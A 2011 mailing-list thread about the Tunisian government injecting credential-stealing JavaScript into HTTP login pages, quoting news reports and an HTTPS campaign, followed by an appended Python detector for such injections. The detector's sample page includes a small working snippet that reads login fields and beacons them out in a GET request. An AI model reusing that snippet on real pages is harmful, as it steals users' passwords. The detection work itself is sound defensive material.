[liberationtech] Tunisian government hacks into gmail and Facebook accounts
Jochai Ben-Avie
jochai at accessnow.org
Thu Jan 13 18:48:56 PST 2011
Given what's been going on in Tunisia and Belarus recently, I thought it'd
be good to remind members of this list of Access’ Demand HTTPS campaign,
which calls on the top 100 websites to implement HTTPS by default on all
pages. Already signatories from over 60 countries have put their name to
this campaign, and I urge you to do so as well. Please also send this to
your friends and colleagues:
https://www.accessnow.org/ProtectOurPrivacy
Public pressure is working. We’ve just got off a call with Yahoo (Ebele
Okobi-Harris and Sonja Gittens-Ottley), and we'll be continuing to call on
them in the strongest terms (follow up call next week with their engineers)
to move their entire platform over to HTTPS. It's inspiring to see the
political momentum in Tunisia and announcements of an end to censorship, but
the threat of unencrypted sites remains a serious global issue with a
relatively simple fix.
Regardless of any technical hurdles to turn on SSL, it’s critical that
Yahoo, Facebook, and other sites understand that there truly is a public
outcry for encrypted communication. There is a real opportunity for change
here. Go to: https://www.accessnow.org/ProtectOurPrivacy
Best,
Jochai
--
Jochai Ben-Avie
Access Policy Analyst
jochai at accessnow.org
+1-888-414-0100 x704 (tel)
JochaiBen-Avie (skype)
On Thu, Jan 13, 2011 at 4:51 PM, Jillian C. York <jilliancyork at gmail.com> wrote:
> From what I'm seeing, the filters have been turned off entirely; even
> Nawaat, which was allegedly blocked by keyword, is currently unfiltered
> (Sami Ben Gharbia's piece on Tunisia's multilayered filtering system:
> http://nawaat.org/portail/2010/08/19/a-first-glimpse-at-the-internet-filtering-in-tunisia/
> ).
>
> -Jillian
>
>
>
> On Thu, Jan 13, 2011 at 4:48 PM, Wagner, Ben <Ben.Wagner at eui.eu> wrote:
>
>> Having hacked Gmail and Facebook accounts, the Tunisian government now
>> claims that it wants to stop internet censorship entirely:
>>
>> "President Zine El Abidine Ben Ali, in a televised speech Thursday night,
>> also pledged to end Internet censorship and to open up the political playing
>> field in a country where he has allowed little public criticism for the past
>> 23 years."
>>
>> Source:
>> http://articles.moneycentral.msn.com/news/article.aspx?feed=AP&date=20110113&id=12601387
>>
>> At least some sites seem to have been unblocked including Youtube and the
>> OpenNet initiative. Whether this is a permanent change or not remains to be
>> seen. The general strike which is supposed to be taking place tomorrow may
>> also have a significant impact on many of the 'promises' made by Ben
>> Ali this evening.
>>
>>
>> http://advocacy.globalvoicesonline.org/2011/01/13/is-tunisian-internet-censorship-shutting-down/
>>
>> Best,
>> Ben
>>
>>
>> On 13 Jan 2011, at 01:33, Terry Winograd wrote:
>>
>> > http://www.fastcompany.com/1715575/tunisian-government-hacking-facebook-gmail-anonymous
>> >
>> > Tunisian Government Allegedly Hacking Facebook, Gmail Accounts of
>> > Dissidents and Journalists
>> > BY Neal Ungerleider, Mon Jan 10, 2011
>> >
>> >> A strange bit of JavaScript has found its way onto Tunisian Internet
>> >> users' internet login screens. Some are now in jail in a country known for
>> >> torture. But they've been adopted by an unlikely ally: Anonymous.
>> >
>> > Massive riots and protests have rocked Tunisia this past month. After
>> > a 26-year-old street vendor named Mohammed Bouazizi attempted to kill
>> > himself by self-immolation (he survived and later died of his burns),
>> > hundreds of thousands took to the North African nation's streets. The
>> > protesters complain of unemployment, economic woes, and an omnipresent
>> > dictatorship. Tunisia's government has stumbled upon a new method of
>> > combating the protesters: hacking into their social media accounts.
>> >
>> > According to a report by the Committee to Protect Journalists, the
>> > Tunisian government appears to be breaking into the Facebook, Google,
>> > and Yahoo accounts of dissidents and journalists. Hackers with unusual
>> > levels of access to Tunisia's state-control network infrastructure
>> > have managed to gain access to Facebook accounts belonging to
>> > individuals such as journalists Sofiene Chourabi of al-Tariq al-Jadid
>> > (New Path; a newspaper affiliated with the opposition Movement
>> > Ettajdid party) and independent video journalist Haythem El Mekki,
>> > while gaining the passwords of others. Hack targets found that
>> > Facebook groups they founded were deleted, as were pictures of
>> > protests. In CPJ's words, "Their accounts and pictures of recent
>> > protests have been deleted or otherwise compromised.” Blogs hosted on
>> > Blogspot and elsewhere are also being targeted. Here is an excerpt
>> > from a post by Lina Ben Mhenni of the A Tunisian Girl blog:
>> >
>> >> Well, I can understand ... No I can't understand that some stupid
>> >> person has hacked my e-mail then, my Facebook account. This stupid person
>> >> has also deleted some pages in which I am an administrator. Pages like that
>> >> of 7ellblog (launch a blog) which has been largely promoted even by official
>> >> media, the page of the Tunisian singer Amel Mathlouthi, Reading Books is
>> >> Better than Staring at others (yes they hate reading and culture in my
>> >> country), the Tunisian blogosphere, and may be a page against censorship '
>> >> la censure nuit à l'image de mon pays' (I don't have the confirmation yet)
>> >> and many other pages were deleted. What happened is so shameful because the
>> >> internet police is again confirming its stupidity and useless stubbornness.
>> >> Sofiene Chourabi and Azyz Amami are experiencing the same problem now. They
>> >> have been hacked.
>> >
>> > Already, in-depth information is surfacing on how the hacks were
>> > committed. It appears that the Agence tunisienne d'Internet, a
>> > government agency which supervises all of Tunisia's ISPs, or someone
>> > with access to the agency committed them. Tunisian ISPs are running a
>> > Java script that siphons off login credentials from users of Facebook,
>> > Yahoo and Gmail. According to the Tech Herald's Steve Ragan:
>> >
>> >> Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s
>> >> Josh Abraham, broke the code down further. Crowley explained that the
>> >> JavaScript is customized for each site’s login form. It will pull the
>> >> username and password, and encode it with a weak crypto algorithm. The newly
>> >> encrypted data is placed into the URL, and a randomly generated five
>> >> character key is added. The randomly generated key is meaningless, but it is
>> >> assumed that it’s there to add a false sense of legitimacy to the URL. The
>> >> random characters and encrypted user information are delivered in the form
>> >> of a GET request to a non working URL.
>> >
>> > The code only targeted users accessing HTTP sites instead of HTTPS,
>> > which appears to be why Facebook was so heavily ravaged by the hack
>> > plan. Facebook users default to using HTTP to access the site.
>> >
>> > Much of this information has been released to the public by the
>> > quasi-4Chan allied Anonymous group, which has launched an
>> > anti-Tunisian government hacker campaign called Operation: Tunisia.
>> >
>> > Amamou was taken into police custody this past week after authorities
>> > apparently found his location via Foursquare. His current whereabouts
>> > are unknown.
>> >
>> > The Agence tunisienne d'Internet has long been one of the most
>> > censorship-happy government agencies in all of Africa. Tunisia's net
>> > firewalls and intricate IP tracking mechanisms have been compared to
>> > China's, while popular sites like YouTube and DailyMotion were banned
>> > due to hosting videos alleging human rights abuses in Tunisian
>> > prisons. In one of the WikiLeaks cables on Tunisia, an anonymous
>> > diplomat notes endemic government corruption and refers to the
>> > government of President-for-life Zine al-Abidine Ben Ali as a
>> > “quasi-mafia” and a police state.
>> >
>> > While Facebook, Google and Yahoo have not spoken publicly on the
>> > alleged Tunisian government hacking campaign yet, the State Department
>> > has. In a press conference on Friday, January 7, spokesperson Philip
>> > Crowley stated:
>> >
>> >> We are concerned about recent reports that Tunisian ISP providers, at
>> >> the direction of the government, hacked into the accounts of Tunisian users
>> >> of American companies including Facebook, and providers of email such as
>> >> Yahoo and Google, and stealing passwords. This kind of interference
>> >> threatens the ability of civil society to realize the benefits of new
>> >> technologies. Cyber intrusions of all kinds, including reported attacks on
>> >> government of Tunisia websites, disrupt the free flow of information and
>> >> reduce overall confidence in the reliability and security of vital
>> >> information networks.
>> >
>> > During the past week, in addition to Amamou, at least three other
>> > members of Tunisia's hacker and blogger communities were taken into
>> > custody by Tunisian police.
>> >
>> >
>> > ----------------------------------
>> >
>> > http://www.thetechherald.com/article.php/201101/6651/Tunisian-government-harvesting-usernames-and-passwords
>> >
>> > Tunisian government harvesting usernames and passwords
>> > by Steve Ragan - Jan 4 2011, 20:08
>> >
>> >
>> > The Tunisian Internet Agency (Agence tunisienne d'Internet or ATI) is
>> > being blamed for the presence of injected JavaScript that captures
>> > usernames and passwords. The code has been discovered on login pages
>> > for Gmail, Yahoo, and Facebook, and said to be the reason for the
>> > recent rash of account hijackings reported by Tunisian protesters.
>> >
>> > ATI is run by the Tunisian Ministry of Communications. They supply all
>> > of the privately held Tunisian ISPs, making them the main source of
>> > Internet access in the country. They’ve been under scrutiny for years,
>> > due to the fact that they make use of their authority to regulate the
>> > entire national network. Last April, ATI earned international
>> > attention by blocking access to sites such as Flickr, YouTube, and
>> > Vimeo.
>> >
>> > According to Reporters Without Borders, authorities claim to target
>> > only pornographic or terrorist websites. “However, censorship applies
>> > above all to political opposition, independent news, and human rights
>> > websites.”
>> >
>> > “When an Internet user attempts to access a prohibited website, the
>> > following automatic error message appears: “Error 404: page not
>> > found,” without displaying the familiar “Error 403” more typical of a
>> > blocked site...This strategy equates to a disguised form of
>> > censorship.”
>> >
>> > As for the JavaScript itself, The Tech Herald has seen examples of the
>> > embedded script during live surfing sessions with sources in Tunisia,
>> > and in posted source code made available to the Web. The source for
>> > the GMail injection is here, the Yahoo injection is here, and Facebook
>> > is here.
>> >
>> > Four different experts consulted by The Tech Herald independently
>> > confirmed our thoughts; the embedded code is siphoning off login
>> > credentials.
>> >
>> > On Twitter, security researcher Gerry Kavanagh and Errata Security CTO
>> > David Maynor told us that you can tell the code is capturing login
>> > information by how it references the login element for the form.
>> >
>> > “Suffice to say, the code is definitely doing something
>> > surreptitious,” Kavanagh noted.
>> >
>> > Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s
>> > Josh Abraham, broke the code down further. Crowley explained that the
>> > JavaScript is customized for each site’s login form. It will pull the
>> > username and password, and encode it with a weak crypto algorithm.
>> >
>> > The newly encrypted data is placed into the URL, and a randomly
>> > generated five character key is added. The randomly generated key is
>> > meaningless, but it is assumed that it’s there to add a false sense of
>> > legitimacy to the URL.
>> >
>> > The random characters and encrypted user information are delivered in
>> > the form of a GET request to a non working URL. In the Gmail example,
>> > you see this URL listed as http://www.google.com/wo0dh3ad. Abraham
>> > noted that the encryption makes it easy to capture usernames and
>> > passwords that would include special characters such as ‘%’ or ‘/’.
>> >
>> > Considering that the backbone of the Tunisian Internet is full of
>> > state run filters and firewalls designed to block access, configuring
>> > one to log the GET commands with the harvested data would be trivial.
>> > But is this a government sponsored action?
>> >
>> > The likelihood that a group of criminals compromised the entire
>> > Tunisian infrastructure is virtually nonexistent. Code planting on
>> > this scale could only originate from an ISP. With their history of
>> > holding an iron grip on the Internet, ATI is the logical source of the
>> > information harvesting.
>> >
>> > There is an upside however, as the embedded JavaScript only appears
>> > when one of the sites is accessed with HTTP instead of HTTPS. In each
>> > test case, we were able to confirm that Gmail and Yahoo were only
>> > compromised when HTTP was used. For Facebook on the other hand, the
>> > default access is HTTP, so users in Tunisia will need to visit the
>> > HTTPS address manually.
>> >
>> > Another interesting note is that it appears the embedded code has
>> > targeted Tunisian users for several months. Slim Amamou, of the Global
>> > Voices Advocacy blog, reported his findings on the code last July, and
>> > at the time, ATI was blocking Google’s HTTPS port, forcing users to
>> > default to HTTP.
>> >
>> > The information surrounding the embedded JavaScript came to our
>> > attention thanks to a user on the IRC server where supporters for
>> > Anonymous’ Operation: Tunisia gathered to show support for Tunisian
>> > protesters. When word spread of embedded code and account hijackings,
>> > Anonymous offered Tunisian users help via Userscripts.org, with a
>> > browser add-on that strips the added JavaScript code.
>> >
>> > The ATI website has been offline for more than a day. The outage
>> > started after Anonymous launched Operation: Tunisia. Our coverage on
>> > their actions and the problems in Tunisia is here.
>> >
>> > --
>> > _______________________________________________
>> > liberationtech mailing list
>> > liberationtech at lists.stanford.edu
>> >
>> > Should you need to change your subscription options, please go to:
>> >
>> > https://mailman.stanford.edu/mailman/listinfo/liberationtech
>> >
>> > If you would like to receive a daily digest, click "yes" (once you click
>> > above) next to "would you like to receive list mail batched in a daily
>> > digest?"
>> >
>> > You will need the user name and password you receive from the list
>> > moderator in monthly reminders.
>> >
>> > Should you need immediate assistance, please contact the list moderator.
>> >
>>
>>
>
>
>
> --
> Berkman Center for Internet and Society |
> https://cyber.law.harvard.edu/people/jyork
> jilliancyork.com | @jilliancyork | tel: +1-857-891-4244
>
>
>
>
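As an added example (not part of this thread or of the articles it quotes), a defender-side heuristic for the pattern the Tech Herald piece describes: an inline script on a login page fetched over HTTP that reads the password field and turns it into a GET request. The sample pages, field names and encoding are constructed assumptions; only the /wo0dh3ad path comes from the article.

```python
"""Heuristic scan of a login page for an injected credential-harvesting script.
Added example, not code from the thread or the quoted articles. It models what the
Tech Herald piece describes: inline JavaScript on an HTTP login page that reads the
username and password fields, encodes them and fires a GET to a bogus path on the
site's own domain. Sample pages, field names and encoding are constructed."""
import re
from html.parser import HTMLParser

class _LoginPageParser(HTMLParser):
    """Collect inline <script> bodies and the name/id of every password input."""
    def __init__(self):
        super().__init__()
        self.scripts, self.password_fields, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and "src" not in a:          # inline scripts only
            self._in_script = True
            self.scripts.append("")
        elif tag == "input" and a.get("type") == "password":
            self.password_fields += [v for k, v in a.items() if k in ("name", "id") and v]

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

# Constructs that turn a string into an outbound GET without submitting the form.
_GET_SINKS = re.compile(r"new\s+Image\s*\(|\.src\s*=|XMLHttpRequest|\.location\s*=|fetch\s*\(")

def find_harvesting_scripts(html):
    """Return inline scripts that both reference a password field and build a GET."""
    p = _LoginPageParser()
    p.feed(html)
    hits = []
    for body in p.scripts:
        touches_pw = any(re.search(rf"\b{re.escape(f)}\b", body) for f in p.password_fields)
        if touches_pw and _GET_SINKS.search(body):
            hits.append(body.strip())
    return hits

# Constructed samples: a clean login form, and the same form with an injected harvester
# appended (weakly encoded credentials plus a random five-character suffix, as described).
CLEAN_PAGE = """<form action="/login" method="post"><input name="user">
<input type="password" name="passwd"><script>document.forms[0].user.focus();</script></form>"""
INJECTED_PAGE = CLEAN_PAGE + """<script>var f=document.forms[0],
q=escape(f.user.value+':'+f.passwd.value)+Math.random().toString(36).slice(2,7);
new Image().src='/wo0dh3ad?'+q;</script>"""
```

Run over a page fetched both with HTTP and HTTPS, a hit that appears only in the HTTP copy is the in-transit injection the article describes; the heuristic will also flag legitimate scripts that beacon password-field state, so treat hits as leads, not verdicts.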